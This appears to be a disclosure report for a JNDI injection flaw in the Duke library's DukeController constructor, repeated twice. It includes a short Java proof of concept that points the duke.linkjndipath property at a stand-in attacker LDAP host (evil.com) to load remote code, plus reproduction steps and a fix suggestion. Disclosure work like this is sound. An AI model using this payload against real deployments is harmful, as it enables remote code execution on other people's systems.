Affected Version
The latest version 1.2 and below.
Describe the vulnerability
There is a method no.priv.garshol.duke.server.DukeController.<constructor>(Properties). If the Properties parameter contains a property ("duke.linkjndipath", "ldap://example.com/Evil"), attackers might execute arbitrary commands through ctx.lookup("ldap://example.com/Evil"). For instance, following codes will lead to the execution of arbitrary codes from attackers:
Properties properties = new Properties();
properties.setProperty("duke.configfile", "src/main/resources/duke.xml");
properties.setProperty("duke.linkdbtype", "jndi");
properties.setProperty("duke.linkjndipath", "ldap://evil.com:12345");
properties.setProperty("duke.database", "mysql");
DukeController controller = new DukeController(properties);
To Reproduce
Build an LDAP server and provide malicious codes. Then just execute above codes would reproduce it.
Fix Suggestion
Filter LDAP, RMI and related protocols when using lookup.
Affected Version The latest version 1.2 and below.
Describe the vulnerability There is a method
no.priv.garshol.duke.server.DukeController.<constructor>(Properties). If the Properties parameter contains a property("duke.linkjndipath", "ldap://example.com/Evil"), attackers might execute arbitrary commands throughctx.lookup("ldap://example.com/Evil"). For instance, following codes will lead to the execution of arbitrary codes from attackers:To Reproduce Build an LDAP server and provide malicious codes. Then just execute above codes would reproduce it.
Fix Suggestion Filter LDAP, RMI and related protocols when using
lookup.